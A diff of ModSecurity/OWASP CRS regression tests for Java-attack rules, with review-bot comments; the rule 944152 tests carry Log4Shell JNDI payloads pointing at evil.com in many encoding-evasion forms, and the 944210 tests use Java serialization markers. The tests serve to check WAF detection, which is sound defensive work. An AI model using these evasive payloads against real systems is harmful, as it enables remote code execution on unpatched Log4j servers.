+ data: '{"foo": "%24%5Cu007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-16
+ desc: Log4J exploit on JSON with URL encoding evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "\u002524%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-17
+ desc: Log4J exploit on JSON with URL encoding evasion, mixed with Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24\u007Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-18
+ desc: Log4J exploit on JSON with named HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24%26lbrace%3Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-19
+ desc: Log4J exploit on JSON with numeric HTML entity evasion wrapped in URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%26%2336%3B%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fwebshell%7D"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-20
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbrace;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-21
+ desc: Log4J exploit on JSON with numeric HTML entity evasion, wrapped in Unicode escape evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026#123;jndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-22
+ desc: Log4J exploit on JSON with named and numeric HTML entity evasion, mixed with unicode escape evasion and URL encoding evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "%24{\u006Andi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-23
+ desc: Log4J exploit on User-Agent header which is known to work against org.apache.commons:commons-text:1.9
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: '${jndi:ldap://evil.om/w}'
+ Content-Type: text/html
+ method: GET
+ port: 80
+ uri: /
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-24
+ desc: Log4J exploit on JSON with named HTML entity evasion, wrapped in Unicode escape evasion, omitting terminal semi-colon
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/json
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbracejndi:ldap://evil.com/webshell}"}'
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-25
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: foo=$${env:somethingveryverylong:-${env:something:-$}{jndi:ldap://evilhost.com/webshell}}}
+ output:
+ log_contains: id "944152"
+ - test_title: 944152-26
+ desc: Log4J exploit on arg foo, with evasion
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ headers:
+ Accept: "*/*"
+ Host: localhost
+ User-Agent: ModSecurity CRS 3 Tests
+ Content-Type: application/x-www-form-urlencoded
+ method: POST
+ port: 80
+ uri: /
+ data: '{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}'
+ output:
+ log_contains: id "944152"
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
index bd74d0a22c..288c536ec7 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944200.yaml
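Review bot: Test 944152-26 is described as `Log4J exploit on arg foo, with evasion` and is sent with `Content-Type: application/x-www-form-urlencoded`, but its body is the JSON document `{"foo": "$\u0026lbracesomethingnotcoveredbyotherrules"}`; under form-urlencoded parsing that body presumably lands in an argument name rather than in an argument `foo`, so the test may pass through a different variable than its description implies. Either send it as JSON like tests 9–24 (`Content-Type: application/json`) or use a form body, and give it a `desc` that names the case it adds, e.g. `desc: Named HTML entity evasion without terminating semicolon, payload not covered by 944150/944151`. 944152-25 also reuses the `desc` of 944152-7 word for word, so a failure in one of them would not be distinguishable from the other by name.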
@@ -1,34 +1,17 @@
 ---
- meta:
- author: "spartantri"
- enabled: true
- name: "944200.yaml"
- description: "Description"
- tests:
-
- -
- test_title: 944200-0FP
- desc: Argument test includes java serialization magic bytes, raw request
- stages:
- -
- stage:
- input:
- stop_magic: true
- dest_addr: "127.0.0.1"
- port: 80
- raw_request: "POST / HTTP/1.0\r\nHost: localhost\r\nUser-Agent: ModSecurity CRS 3 Tests\r\nAccept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\r\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\nAccept-Encoding: gzip,deflate\r\nAccept-Language: en-us,en;q=0.5\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 9\r\n\r\ntest=\xac\xed\x00\x05\r\n\r\n"
- output:
- no_log_contains: "id \"944200\""
-
- -
- test_title: 944200-1
- desc: Argument test includes java serialization magic bytes, base64 encoded request
- stages:
- -
- stage:
- input:
- dest_addr: "127.0.0.1"
- port: 80
- encoded_request: "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"
- output:
- log_contains: "id \"944200\""
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944200.yaml"
+ description: "Description"
+tests:
+ - test_title: 944200-1
+ desc: Argument test includes java serialization magic bytes, base64 encoded request
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ encoded_request: "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"
+ output:
+ log_contains: "id \"944200\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
index e89d782004..136522c042 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml
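Review bot: Dropping 944200-0FP leaves rule 944200 with no `no_log_contains` case at all, so the rewritten file only ever checks that the rule fires and never that a request carrying the raw serialization bytes is handled the way the deleted test asserted. If the removal is because the runner no longer accepts `raw_request`/`stop_magic` inputs, a replacement negative test written with the supported `data:` form would keep that coverage; otherwise the reason for dropping it belongs in the commit message. The placeholder `description: "Description"` is also carried over into the new layout unchanged; something like `description: "Tests for rule 944200 (java serialization magic bytes)"` would tell a reader what the file covers.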
@@ -1,1186 +1,1057 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944210.yaml" - description: "Positive tests for rule 944210" - tests: - - - test_title: 944210-0 - desc: "Argument test includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=rO0ABQ" - output: - log_contains: "id \"944210\"" +meta: + author: "spartantri" + enabled: true + name: "944210.yaml" + description: "Positive tests for rule 944210" +tests: + - test_title: 944210-1 + desc: "Argument test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-2 + desc: "Argument name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-3 + desc: 
"Cookie test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-4 + desc: "Cookie name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: rO0ABQ=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-5 + desc: "Request header test includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: rO0ABQ + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-6 + desc: "XML element includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 
"gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-7 + desc: "XML attribute name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-8 + desc: "XML attribute value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-9 + desc: "XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-10 + desc: "Nested XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" 
+ Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-11 + desc: "Content-Type text/plain includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=rO0ABQ" + output: + log_contains: "id \"944210\"" + - test_title: 944210-12 + desc: "Content-Type application/json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"rO0ABQ\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-13 + desc: "Content-Type application/json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"rO0ABQ\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 
944210-14 + desc: "Content-Type multipart/form-data json arg name includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-1 - desc: "Argument name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "rO0ABQ=test" - output: - log_contains: "id \"944210\"" + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-15 + desc: "Content-Type multipart/form-data json arg value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + 
Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-2 - desc: "Cookie test includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=rO0ABQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" + {"rO0ABQ": "test"} + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-16 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-3 - desc: "Cookie name includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - 
Cookie: rO0ABQ=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-17 + desc: "Content-Type multipart/form-data XML element value includes keyword rO0ABQ" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - - - test_title: 944210-4 - desc: "Request header test includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: rO0ABQ - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944210\"" + rO0ABQ + -----------------------------thisissparta-- + output: + log_contains: "id \"944210\"" + - test_title: 944210-18 + desc: "Argument test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 
"en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-19 + desc: "Argument name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU=test" + output: + log_contains: "id \"944210\"" + - test_title: 944210-20 + desc: "Cookie test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-21 + desc: "Cookie name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: KztAAU=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-22 + desc: "Request header test includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + 
headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: KztAAU + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944210\"" + - test_title: 944210-23 + desc: "XML element includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-24 + desc: "XML attribute name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + no_log_contains: "id \"944210\"" + - test_title: 944210-25 + desc: "XML attribute value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id 
\"944210\"" + - test_title: 944210-26 + desc: "XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-27 + desc: "Nested XML element value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-28 + desc: "Content-Type text/plain includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=KztAAU" + output: + log_contains: "id \"944210\"" + - test_title: 944210-29 + desc: "Content-Type application/json arg value includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + 
Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"KztAAU\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-30 + desc: "Content-Type application/json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"KztAAU\": \"test\"}" + output: + log_contains: "id \"944210\"" + - test_title: 944210-31 + desc: "Content-Type multipart/form-data json arg name includes keyword KztAAU" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - - - test_title: 944210-5 - desc: "XML element includes keyword rO0ABQ" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: 